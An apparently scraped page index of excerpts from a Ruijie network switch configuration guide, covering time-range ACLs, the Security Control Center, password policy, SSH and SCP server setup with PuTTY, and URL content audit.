  • Page 942 Configuration Guide Configuring ACL Building configuration... Current configuration : 59 bytes interface GigabitEthernet 0/1 security access-group exp_ext_esc 11.4.6 Configuring the Time Range-Based ACEs Configuration Effect Configure the time range-based ACEs if you want some ACEs to take effect or to become invalid in a specified period of time, for example, in some time ranges during a week.

  • Page 943: Scenario

    Add an ACE to permit all packets.  Apply the ACL to the outgoing direction of the interface connected to the breakout gateway. Ruijie(config)# time-range access-internet Ruijie(config-time-range)# periodic daily 12:00 to 13:30 Ruijie(config-time-range)# exit sw1(config)# ip access-list standard ip_std_internet_acl sw1(config-std-nacl)# permit 10.1.1.0 0.0.0.255 time-range access-internet...
  • Page 944 Configuration Guide Configuring ACL sw1(config-std-nacl)# deny 10.1.1.0 0.0.0.255 sw1(config-std-nacl)# permit any sw1(config-std-nacl)# exit sw1(config)#int gigabitEthernet 0/2 sw1(config-if-GigabitEthernet 0/2)# ip access-group ip_std_internet_acl out  Verification Within the time range between 12:00 and 13:30, visit the Baidu website on a PC of the R&D department.
  • Page 945 Configuration Guide Configuring ACL  Configuring Comments for ACLs  (Optional) Configure comments for ACLs so that it is easy to manage and understand the configured ACLs.  Adding ACEs to an ACL  (Optional) An ACL may contain zero or multiple ACEs. If no ACE is configured, it is equivalent that the security channel does not take effect.
  • Page 946 Configuration Guide Configuring ACL  Adding ACEs to an ACL For details about how to add ACEs to an ACL, see the earlier descriptions about the IP ACL, MAC extended ACL, expert extended ACL, or IPv6 ACL.  Configuring Comments for ACEs Use either of the following two methods to configure a comment for an ACE: Command remark comment...
  • Page 947 Configuration Guide Configuring ACL Displays the MAC extended ACL configurations applied to show mac access-group [interface interface-name ] an interface. Displays the expert extended ACL configurations applied to show expert access-group [interface interface-name ] an interface. Displays the IPv6 ACL configurations applied to an show ipv6 traffic-filter [interface interface-name ] interface.

  • Page 948: Scenario

    Configuration Guide Configuring SCC 12 Configuring SCC 12.1 Overview The Security Control Center (SCC) provides common configuration methods and policy integration for various access control and network security services, so that these access control and network security services can coexist on one device to meet diversified access and security control requirements in various scenarios.
  • Page 949 Configuration Guide Configuring SCC Note A traditional campus network is hierarchically designed, which consists of an access layer, a convergence layer and a core layer, where the access layer performs user access control. On an extended Layer 2 campus network, however, user access control is performed by a core switch, below which access switches exist without involving any convergence device in between.
  • Page 950 Configuration Guide Configuring SCC  On the downlink ports of the core switch (switch A in this example) that connect to the teachers' living area and the students' living area, both dot1x authentication and Web authentication are enabled, so that users can freely select either authentication mode for Internet access.
  • Page 951 Configuration Guide Configuring SCC 12.4 Configuration Configuration Item Suggestions and Related Commands Optional configuration, which is used to specify whether to enable the user online-status detection function. Configuring User Configures the parameters of the user offline-detect interval threshold Online-Status Detection online-status detection function.
  • Page 952 Configuration Guide Configuring SCC default offline-detect: Restores the default value. In other words, an online user will be disconnected when the device detects that the user does not have any traffic within eight hours. 8 hours Default Configuration Command Global configuration mode Mode Usage Guide Use this command to configure user online-status detection, so that a user is disconnected when its traffic is...
  • Page 953 Configuration Guide Configuring SCC  Configure user online-status detection so that a user is disconnected if the user does not have traffic within five minutes. sw1(config)# offline-detect interval 5 threshold 0 Switch A  Verification Perform dot1x authentication using dot1x SU client for a PC in the R&D department, so that the PC gets online.
  • Page 954 Configuration Guide Configuring Password Policy 13 Configuring Password Policy 13.1 Overview The Password Policy is a password security function provided for local authentication of the device. It is configured to control users' login passwords and login states.  The following sections introduce password policy only. 13.1.1.1 Protocols and Standards 13.2 Features 13.2.1.1 Basic Concepts...
  • Page 955 Configuration Guide Configuring Password Policy not meet system requirements or the new passwords consecutively input twice are not the same, the system will ask the user to input the new password once again. Guard Against Repeated Use of Passwords When changing the password, the user will set a new password while the old password will be recorded as the user's history records.
  • Page 956 Configuration Guide Configuring Password Policy 13.3.1 Configuring the Password Security Policy 13.3.1.1 Networking Requirements  Provide a password security policy for local authentication of the device. Users can configure different password security policies to implement password security management. 13.3.1.2 Notes ...
  • Page 957 Configuration Guide Configuring Password Policy 13.3.1.4 Verification Configure a local user on the device, and configure a valid password and an invalid password for the user.  When you configure the valid password, the device correctly adds the password.  When you configure the invalid password, the device displays a corresponding error log.
  • Page 958 Configuration Guide Configuring Password Policy password history records of a user is greater than the maximum number configured for the user, the new password history record will overwrite the user's oldest password history record. Enabling the Strong Password Detection Function Command password policy strong Syntax...
  • Page 959 Set the no-repeat times of password history records to 3.  Enable the strong password detection function. Ruijie# configure terminal Ruijie(config)# password policy min-size 8 Ruijie(config)# password policy life-cycle 90 Ruijie(config)# service password-encryption Ruijie(config)# password policy no-repeat-times 3 Ruijie(config)# password policy strong...
  • Page 960 Configuration Guide Configuring Password Policy Password no-repeat-times: Enabled (max history record: 3) 13.3.1.7 Common Errors  The time configured for giving a pre-warning notice about password expiry to the user is greater than the password life cycle. 13.4 Monitoring 13.4.1.1 Displaying the Running Status Command Function show password policy...

  • Page 961: Configuring Ssh

    SSH connection with a SSH-server device. In this way, the local device can safely log in to a remote device through SSH to implement management. Currently, a device can work as either the SSH server or an SSH client, supportingSSHv1 and SSHv2 versions. Ruijie SSH service supports both IPv4 and IPv6.

  • Page 962: Scenario

    Configuration Guide Configuring SSH Application Description SSH AAA Authentication Use the authentication, authorization and accounting (AAA) mode for SSH user authentication. SSH Public Key Authentication Use the public key authentication for SSH user authentication. SSH File Transfer Use the Secure Copy (SCP) commands on the client to exchange data with the SSH server.

  • Page 963: Scenario

    Configuration Guide Configuring SSH  Five lines, including Line 0 to Line 4, are activated concurrently. The login password is "passzero" for Line 0 and "pass" for the remaining lines. Any user name can be used. Figure 14-2 Networking Topology of SSH Local Line Password Authentication Deployment ...

  • Page 964: Scenario

    Configuration Guide Configuring SSH clients. Two authentication methods, including Radius server authentication and local authentication, are provided in the AAA authentication method list to ensure reliability. The Radius server authentication method is preferred. If the Radius server does not respond, it turns to the local authentication. Figure 14-3 Networking Topology of SSH AAA Authentication Deployment ...

  • Page 965: Scenario

    Configuration Guide Configuring SSH  After the key is generated on the client, the SSH server will copy the file of the public key from the client to the flash and associates the file with the SSH user name. Each user can be associated with one RSA public key and one DSA public key.
  • Page 966 Configuration Guide Configuring SSH To ensure secure communication, interaction between an SSH server and an SSH client undergoes the following seven stages:  Connection setup The server listens on Port 22 to the connection request from the client. After originating a socket initial connection request, the client sets up a TCP socket connection with the server.
  • Page 967 Configuration Guide Configuring SSH SCP Service After the SCP service is enabled, you can directly download files from the network device and upload local files to the network device. In addition, all interactive data is encrypted, featuring authentication and security. 14.3.1 SSH Server Enable the SSH server function on a network device, and you can set up a secure connection with the network device through the SSH client.
  • Page 968 Configuration Guide Configuring SSH Run the ip ssh time-out command to configure the user authentication timeout of the SSH server. Use the no form of the command to restore the default timeout. The SSH server starts the timer after receiving a user connection request. If authentication does not succeed before the timeout is reached, authentication times out and fails.
  • Page 969 Configuration Guide Configuring SSH Related Configuration  Enabling the SCP Server By default, the SCP server function is disabled. Run the ip scp server enable command to enable SCP server function on a network device. 14.4 Configuration The SSH function is not supported on AP110-W or AP120-W. Configuration Description and Command It is mandatory to enable the SSH server.
  • Page 970 Configuration Guide Configuring SSH  You can specify the SSH version.  You can configure the SSH authentication timeout.  You can configure the maximum number of SSH authentication retries. Notes  The precondition of configuring a device as the SSH server is that communication is smooth on the network that the device resides, and the administrator can access the device management interface to configure related parameters.
  • Page 971 Configuration Guide Configuring SSH  Only SSHv2 supports authentication based on the public key. This configuration associates a public key file on the client with a user name. When a client is authenticated upon login, a public key file is specified based on the user name. Verification ...
  • Page 972 Configuration Guide Configuring SSH SSHv1 uses an RSA key, whereas SSHv2 uses an RSA or DSA key. If an RSA key is generated, both SSHv1 and SSHv2 are supported. If only a DSA key is generated, only SSHv2 can use the key. ...
  • Page 973 SSH Server Ruijie#configure terminal Ruijie(config)# crypto key generate rsa Choose the size of the rsa key modulus in the range of 512 to 2048 and the size of the dsa key modulus in the range of 360 to 2048 for your Signature Keys.
  • Page 974 Configuring SSH key. If the public information about the RSA key exists, the RSA key has been generated. SSH Server Ruijie(config)#show crypto key mypubkey rsa % Key pair was generated at: 1:49:47 UTC Jan 4 2013 Key name: RSA1 private Usage: SSH Purpose Key Key is not exportable.
  • Page 975 Run the ip ssh peer username public-key { rsa | dsa}filename command to associate a public key file of the client with a user name. When the client is authenticated upon login, a public key file (for Steps example, RSA)is specified based on the user name. SSH Server Ruijie#configure terminal Ruijie(config)# ip ssh peer test public-key rsaflash:rsa.pub...

  • Page 976: Scenario

    Configuration Guide Configuring SSH  Verification Configure the public key authentication login mode on the SSH client and specify the private key file. Check whether you can successfully log in to the SSH server from the SSH client. If yes, the public key file on the client is successfully associated with the user name, and public key authentication succeeds.
  • Page 977 Configuration Guide Configuring SSH Host Name (or IP address) indicates the IP address of the host to be logged in. In this example, the IP address is 192.168.23.122. Port indicates the port ID 22, that is, the default ID of the port listened by SSH. Connection type is SSH.
  • Page 978 Configuration Guide Configuring SSH As shown in Figure 14-8, select 2 as the preferred SSH protocol version in the Protocol options pane because SSHv2 is used for login. Figure 14-9...
  • Page 979 Configuration Guide Configuring SSH As shown in Figure 14-9, select Attempt "keyboard-interactive" auth as the authentication method to support authentication based on the user name and password. Then, click Open to connect to the configured server host, as shown in Figure 14-10. Figure 14-10 The PuTTY Security Alert box indicates that you are logging in to the client of the server 192.168.23.122, and asks you whether to receive the key sent from the server.
  • Page 980 Configuration Guide Configuring SSH If you select Yes, a login dialog box is displayed, as shown in Figure 14-11. Figure 14-11 Type in the correct user name and password, and you can log in to the SSH terminal interface, as shown inFigure 14-12.
  • Page 981 Run the show ip ssh command to display the configurations that are currently effective on the SSH server.  Run the show ssh command to display information about every SSH connection that has been established. Ruijie#show ip ssh SSH Enable - version 1.99 Authentication timeout: 120 secs Authentication retries: 3 Ruijie#show ssh...

  • Page 982: Scenario

    SSH server is reachable. The interface IP address configurations are shown in Figure 14-14. The detailed procedures for configuring IP addresses and routes are omitted. Ruijie(config)# enable service ssh-server Ruijie(config)#crypto key generate rsa % You already have RSA keys.
  • Page 983 How many bits in the modulus [512]: % Generating 512 bit RSA1 keys ...[ok] % Generating 512 bit RSA keys ...[ok] Ruijie(config)#interface fastEthernet0/1 Ruijie(config-if-fastEthernet0/1)#ip address 192.168.23.122 255.255.255.0 Ruijie(config-if-fastEthernet0/1)#exit Ruijie(config)#line vty 0 Ruijie(config-line)#password passzero Ruijie(config-line)#privilege level 15 Ruijie(config-line)#login...
  • Page 984  Verification Run the show running-config command to display the current configurations.  Verify that the SSH client configurations are correct. SSH Server Ruijie#show running-config Building configuration... enable secret 5 $1$eyy2$xs28FDw4s2q0tx97 enable service ssh-server interface fastEthernet0/1 ip address 192.168.23.122 255.255.255.0...
  • Page 985 Set up a connection, and enter the correct password. The login password is "passzero" for Line 0 and "pass" for the remaining lines. Then, the SSH server operation interface is displayed, as shown in Figure 14-15. Figure 14-15 Ruijie#show users Line User...

  • Page 986: Scenario

    SSH Server Ruijie(config)# enable service ssh-server Ruijie(config)#crypto key generate rsa % You already have RSA keys. % Do you really want to replace them? [yes/no]: Choose the size of the key modulus in the range of 360 to 2048 for your Signature Keys.
  • Page 987 Ruijie(config-if-gigabitEthernet1/1)#ip address 192.168.217.81 255.255.255.0 Ruijie(config-if-gigabitEthernet1/1)#exit Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 192.168.32.120 Ruijie(config)#radius-server key aaaradius Ruijie(config)#aaa authentication login methodgroup radius local Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication method Ruijie(config-line)#exit Ruijie(config)#username user1 privilege 1 password 111 Ruijie(config)#username user2 privilege 10 password 222...
  • Page 988 Configuration Guide Configuring SSH aaa authentication login method group radius local username user1 password 111 username user2 password 222 username user2 privilege 10 username user3 password 333 username user3 privilege 15 no service password-encryption radius-server host 192.168.32.120 radius-server key aaaradius enable secret 5 $1$hbgz$ArCsyqty6yyzzp03 enable service ssh-server interface gigabitEthernet1/1...

  • Page 989: Scenario

    Configuration Guide Configuring SSH Ruijie#show users Line User Host(s) Idle Location 0 con 0 idle 00:00:31 * 1 vty 0 user idle 00:00:33 192.168.217.60  Configuring Public Key Authentication of SSH Users Scenario Figure 14-17 SSH users can use the public key for user authentication, and the public key algorithm is RSA or DSA, as shown in Figure 14-17.SSH is configured on the client so that a secure connection is set up between the...
  • Page 990 Configuration Guide Configuring SSH When a key is being generated, you need to constantly move the mouse over a blank area outside the green progress bar; otherwise, the progress bar does not move and key generation stops, as shown in Figure 14-19.
  • Page 991 Configuration Guide Configuring SSH To ensure security of the RSA public key authentication, the length of the generated RSA key pair must be equal to or larger than 768 bits. In this example, the length is set to 1024 bits. Figure 14-20...
  • Page 992 Configuration Guide Configuring SSH After the key pair is generated, click Save public key, type in the public key name test_key.pub, select the storage path, and click Save. Then click Save private key. The following prompt box is displayed. Select Yes, type in the public key name test_private, and click Save.
  • Page 993 Configuration Guide Configuring SSH SSH Server Ruijie#configure terminal Ruijie(config)# ip ssh peer test public-key rsaflash:test_key.pub  Verification After completing the basic configurations of the client and the server, specify the private key file test_private on the PuTTY client, and set the host IP address to 192.168.23.122 and port ID to 22 to set up a connection between the client and the server.
  • Page 994 Configuration Guide Configuring SSH Common Errors  The no crypto key generate command is used to delete a key. 14.4.2 Configuring the SCP Service Configuration Effect After the SCP function is enabled on a network device, you can directly download files from the network device and upload local files to the network device.

  • Page 995: Scenario

     Configuration Run the ip scp server enable command to enable the SCP server. Steps Ruijie#configure terminal Ruijie(config)#ip scp server enable  Verification Run the show ip ssh command to check whether the SCP server function is enabled. Ruijie(config)#show ipssh SSH Enable - version 1.99...
  • Page 996 -l: Limits the transmission speed (unit: Kbit/s). For other parameters, see the filescp.0. SSH Server Ruijie#configure terminal Ruijie(config)# ip scp server enable  Verification File transmission example on the Ubuntu 7.10 system: Set the username of a client to test and copy the config.text file from the network device with the IP address of 192.168.195.188 to the /root directory on the local device.
  • Page 997 Configuration Guide Configuring SSH Description Command Displays the effective SSH server configurations. show ipssh Displays the established SSH connection. show ssh Displays the public information of the SSH public show crypto key mypubkey key. Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use.

  • Page 998: Scenario

    Configuration Guide Configuring Content Audit 15 Configuring Content Audit 15.1 Overview URL audit mainly supervises URL access for intranet users. 15.2 Applications Application Description Typical URL Audit Scenario Basic scenarios and features of URL audit 15.2.1 Typical URL Audit Scenario Scenario URL audit: mainly monitors and audits URL access for intranet users.
  • Page 999 Configuration Guide Configuring Content Audit  URL audit is disabled by default.  Run the url-rule audit-default-enable command to enable URL audit.  Run the url-rule apply referrer and url-audit { except-postfix | except-regexp | first-get | only-get | optimize-cache [ time ] } commands to optimize URL audit by avoiding auditing spam URLs.
  • Page 1000 Configuration Guide Configuring Content Audit  Configuring URL Audit Optimization  (Optional) URL audit optimization is enabled by default. You can disable it if you want to change the default setting or this function is not required. Verification Use the show running-config command to display the configuration status. Related Commands ...
  • Page 1001 Configuration Example  Enabling Default URL Audit  Configuration Enable default URL audit. Steps Ruijie# configure terminal Ruijie(config)# url-rule audit-default-enable Ruijie(config)# end  Verification Use the show running-config command to display the configuration status.  Enabling the Referer Field Audit ...

Table of Contents